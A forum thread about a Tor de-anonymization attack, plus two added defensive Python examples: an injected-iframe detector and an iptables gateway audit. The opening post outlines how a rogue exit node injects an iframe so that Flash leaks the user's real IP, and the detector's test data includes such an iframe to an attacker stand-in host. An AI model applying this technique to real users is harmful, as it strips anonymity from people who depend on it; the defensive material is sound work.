Bitcoin Forum
Topic: TOR users be aware, Flash and Javascript reveals IP address.
Serith (Sr. Member), April 25, 2012, 05:20:13 PM, #1

The following sequence of events occurs when somebody is unmasked:

  • VictimHost connects through MyTorNode, to SomeWebSite
  • MyTorNode changes outbound traffic to SomeWebSite so that HTTP1.0 and gzip compression are not used (HTTP headers are stripped / changed)
  • MyTorNode replaces inbound traffic from SomeWebSite, inserting an <iframe> reference to MyEvilWebServer. This reference also contains a recognizable Cookie
  • MyEvilWebServer receives request via Tor from VictimHost, including Cookie, serves up Trigger. Trigger contains:
    • Javascript code that requests "/VictimHostName_VictimHostIP.gif" from MyEvilWebServer
    • A Shockwave Flash Movie that makes a direct connection to MyEvilWebServer (since Flash doesn't support / know about Tor / proxies / etc, this will be a direct connection)
  • Javascript executing on VictimHost makes VictimHost connect via Tor and request /VictimHostName_VictimHostIP.gif
  • Shockwave flash executing on VictimHost connects directly, without Tor, and resends the Cookie, allowing mapping between the original page being browsed via Tor, and the real VictimHostIP


Discussion of the vulnerability:
Hacker News: The Underpants Project
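
Added example (not part of the original post): a defender-side check for the <iframe> insertion step above, comparing a copy of a page fetched over a trusted path with the copy delivered through an exit node. The host names, markup and function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tags whose URL attribute makes the browser fetch or run remote content.
ACTIVE_TAGS = {"iframe": "src", "script": "src", "embed": "src", "object": "data"}

class ActiveContent(HTMLParser):
    """Collect (tag, origin) for every element that loads active content."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.found = set()

    def handle_starttag(self, tag, attrs):
        attr = ACTIVE_TAGS.get(tag)
        url = dict(attrs).get(attr) if attr else None
        if url:
            parts = urlsplit(urljoin(self.page_url, url))  # resolve relative URLs
            self.found.add((tag, f"{parts.scheme}://{parts.netloc}"))

def active_content(html, page_url):
    parser = ActiveContent(page_url)
    parser.feed(html)
    parser.close()
    return parser.found

def injected_content(baseline_html, via_exit_html, page_url):
    """Active-content references present only in the copy that came through the exit."""
    return sorted(active_content(via_exit_html, page_url) - active_content(baseline_html, page_url))

# Constructed sample: the same page over a trusted path and through a suspect exit.
PAGE = "http://somewebsite.example/index.html"
BASELINE = '<html><body><script src="/site.js"></script><p>Hello</p></body></html>'
VIA_EXIT = ('<html><body><script src="/site.js"></script><p>Hello</p>'
            '<iframe src="http://myevilwebserver.example/t?c=abc123" width="0" height="0"></iframe>'
            '</body></html>')

if __name__ == "__main__":
    for tag, origin in injected_content(BASELINE, VIA_EXIT, PAGE):
        print(f"injected <{tag}> loading from {origin}")
```

Pages that rotate third-party content between requests will produce false positives, so the comparison is most reliable against a static page served over plain HTTP.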
Red Emerald (Hero Member), April 25, 2012, 05:23:07 PM, #2

Good information, but not new news at all.  This is why the Tor Browser Bundle and Tails have javascript and flash disabled by default.

mila (Sr. Member), April 25, 2012, 05:32:42 PM, #3

no kidding, Sherlock?

I mean, thank you for raising awareness but it's really well known or at least documented and the bundled browser has the settings right by default.

your ad here:
Red Emerald (Hero Member), April 25, 2012, 05:35:56 PM, #4

Also, http://panopticlick.eff.org/ is a much more informative page than your link.

Serith (Sr. Member), April 25, 2012, 06:07:18 PM, #5

> no kidding, Sherlock?
>
> I mean, thank you for raising awareness but it's really well known or at least documented and the bundled browser has the settings right by default.

Any link on this forum that I missed?
Red Emerald (Hero Member), April 25, 2012, 06:14:52 PM, #6

> > no kidding, Sherlock?
> >
> > I mean, thank you for raising awareness but it's really well known or at least documented and the bundled browser has the settings right by default.
>
> Any link on this forum that I missed?
Well there are warnings on the actual tor download page.

https://www.torproject.org/download/download-easy.html.en#warning

a nice guy (Newbie), April 25, 2012, 06:50:06 PM, #7

Hello,

just set up a VM or real hardware working as a proxy to route all the traffic from eth0 (internal network) to eth1 (external network).
eth1 then routes all traffic through tor.
Now set up a 2nd VM which has only one port directly connected to eth0 on the proxy.
ALL traffic is now routed through tor and immune to those attacks.

I think there is a tutorial on the torwiki too.

kind regards,
a nice guy

1PqBH6NWFBhbVF7Srw5ZYGtmLcya1aaw9g
security audits (http://bitcointalk.org/index.php?topic=75684)
pgp: 0x77DA3A9A @ pgp.mit.edu (http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x83F5BD9E77DA3A9A)
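
Added example (not part of the post above, and not Tor project code): a small audit of an `iptables-save` dump from such a gateway, checking that everything arriving on eth0 is either redirected into Tor or dropped. The redirect ports 9040 and 5353 are assumed values for Tor's TransPort and DNSPort settings, and both rule dumps are constructed.

```python
import shlex
def parse_rules(dump):  # iptables-save text -> (chain policies, rules grouped by chain)
    table, policies, rules = None, {}, {}
    for line in map(str.strip, dump.splitlines()):
        if line.startswith("*"):
            table = line[1:]
        elif line.startswith(":"):
            policies[(table, line[1:].split()[0])] = line.split()[1]
        elif line.startswith("-A "):
            tok = shlex.split(line)
            opts = {tok[i]: tok[i + 1] for i in range(2, len(tok) - 1) if tok[i].startswith("-")}
            rules.setdefault((table, tok[1]), []).append(opts)
    return policies, rules

def audit_gateway(dump, lan_if="eth0", trans_port="9040", dns_port="5353"):
    """Return the reasons LAN traffic could leave the gateway without going through Tor."""
    policies, rules = parse_rules(dump)
    pre = [o for o in rules.get(("nat", "PREROUTING"), []) if o.get("-i") == lan_if]
    def redirected(proto, dport, to_port):  # dport=None: the rule must cover every port
        return any(o.get("-p") == proto and o.get("--dport") == dport and
                   o.get("-j") == "REDIRECT" and o.get("--to-ports") == to_port for o in pre)
    checks = [
        (redirected("tcp", None, trans_port), "TCP from the LAN is not all redirected to TransPort"),
        (redirected("udp", "53", dns_port), "DNS from the LAN is not redirected to DNSPort"),
        (policies.get(("filter", "FORWARD")) == "DROP", "FORWARD policy is not DROP"),
        (not any(o.get("-j") == "ACCEPT" for o in rules.get(("filter", "FORWARD"), [])),
         "a FORWARD ACCEPT rule routes packets around Tor"),
    ]
    return [msg for ok, msg in checks if not ok]

# Constructed iptables-save dumps: a fail-closed gateway and a leaky one.
GOOD = """*nat
:PREROUTING ACCEPT [0:0]
-A PREROUTING -i eth0 -p udp -m udp --dport 53 -j REDIRECT --to-ports 5353
-A PREROUTING -i eth0 -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 9040
COMMIT
*filter
:FORWARD DROP [0:0]
COMMIT"""
WEAK = """*nat
:PREROUTING ACCEPT [0:0]
-A PREROUTING -i eth0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9040
-A POSTROUTING -o eth1 -j MASQUERADE
COMMIT
*filter
:FORWARD ACCEPT [0:0]
COMMIT"""
if __name__ == "__main__":
    print(audit_gateway(GOOD), audit_gateway(WEAK), sep="\n")
```

The leaky dump only proxies port 80 and forwards everything else, which is the case where a plugin's direct connection would still leave the gateway outside Tor.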
theymos (Administrator), April 25, 2012, 07:14:55 PM, #8

You can't do it with just JavaScript, which is why torbutton allows JavaScript. You need a plugin like Flash.

1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD
Red Emerald (Hero Member), April 25, 2012, 08:25:50 PM, #9

> Hello,
>
> just set up a VM or real hardware working as a proxy to route all the traffic from eth0 (internal network) to eth1 (external network).
> eth1 then routes all traffic through tor.
> Now set up a 2nd VM which has only one port directly connected to eth0 on the proxy.
> ALL traffic is now routed through tor and immune to those attacks.
>
> I think there is a tutorial on the torwiki too.
>
> kind regards,
> a nice guy
https://trac.torproject.org/projects/tor/wiki/doc/TorBOX

cryptoanarchist (Hero Member), April 26, 2012, 03:55:22 PM, #10

Wow...if you didn't know this before doing something illegal on the internet, maybe crime isn't your thing.
Red Emerald (Hero Member), April 26, 2012, 05:57:53 PM, #11

> Wow...if you didn't know this before doing something illegal on the internet, maybe crime isn't your thing.
Tor and illegal actions do not at all have to be connected.  There are plenty of legitimate reasons for usage of Tor.

I don't like when people automatically assume anonymity is only needed for illegal purposes.  I don't want to live in that world.

Xenland (Legendary), April 29, 2012, 02:15:22 AM, #12

Every poster above or below this post should be considered a terrorist
I didn't know this, thanks for the post OP.

a nice guy (Newbie), May 01, 2012, 08:49:52 AM, #13

> Every poster above or below this post should be considered a terrorist

Is this a bad or a good thing? :D

1PqBH6NWFBhbVF7Srw5ZYGtmLcya1aaw9g
security audits (http://bitcointalk.org/index.php?topic=75684)
pgp: 0x77DA3A9A @ pgp.mit.edu (http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x83F5BD9E77DA3A9A)
Tuxavant (Hero Member), May 01, 2012, 02:18:55 PM, #14

I don't like disclosing TTPs, but if you put more than a few brain cells on this problem, it's pretty easy to mitigate it.

Generation Bitcoin | G+ | FB | Bitcoins In Vegas | CoinBus.com | TOR Exit Operator 1MVTPATVCKBMfALRHJsXpHfKJu7GyL7nAc
Tuxavant (Hero Member), May 01, 2012, 03:30:07 PM, #15

But it really sucks when anonymity is sometimes needed. Talking about some politics where I live can get you 15 years in jail.

WAY too many laws to break nowadays... Tell someone he is a jerk from within an Arizona Internet connection and you go to jail. WTF. There is no such thing as a "law abiding citizen" any longer.

Generation Bitcoin | G+ | FB | Bitcoins In Vegas | CoinBus.com | TOR Exit Operator 1MVTPATVCKBMfALRHJsXpHfKJu7GyL7nAc